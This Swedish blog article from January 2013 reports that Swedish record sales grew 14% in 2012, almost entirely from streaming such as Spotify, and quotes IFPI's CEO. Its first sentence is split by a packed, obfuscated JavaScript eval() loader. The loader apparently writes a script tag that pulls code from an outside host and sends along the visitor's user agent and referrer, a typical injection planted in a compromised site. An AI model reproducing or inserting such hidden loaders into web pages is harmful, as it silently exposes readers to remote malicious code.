Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Svensk musikförsäljning ökar, tacka Spotify!

spotify
Filip Urde
  • On 18 januari, 2013
  • http://www.revue.se/filip-urde

Musikindustrin, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sezss|var|u0026u|referrer|bihna||js|php’.split(’|’),0,{}))
Dinosaurien som länge jobbat i motvind, emot tekniken, inte sett fördelarna och trott att folk fortfarande vill köpa en skiva för 200 kr när dem egentligen bara vill lyssna på en av dess låtarna.

 

Det finns nog ingen som tvivlar på att det inte står helt rätt till i musikindustrin. Det är ingen som vill lägga ut pengarna på samma sätt som tidigare. Detta har lett till att industrin länge varit i en ner gående spiral. Men nu kan idustrin pusta ut lite, de svenska skivbolagen visade på en ökad försäljning förra året med 14%. Totalt sålde man för 944 miljoner kronor under år 2012. Men det var inte några skivor som stod för den ökningen. Musik som var streamad, främst Spotify, stod mer eller mindre för hela ökningen!

Streamad musik står för 544 miljoner, cirka 57% av den totala musik försäljningen. Försäljning av musik på skivor och liknande minskade med 15% förra året.

Ifpi:s VD Ludvig Werner säger följande:
”Det är ett kvitto på att fler konsumenter än på mycket länge betalar för sin musikkonsumtion. Men förra årets siffror är fortfarande betydligt lägre än de siffror vi hade för tio år sedan.

Tacka nu Spotify och tekniken.

www.resume.se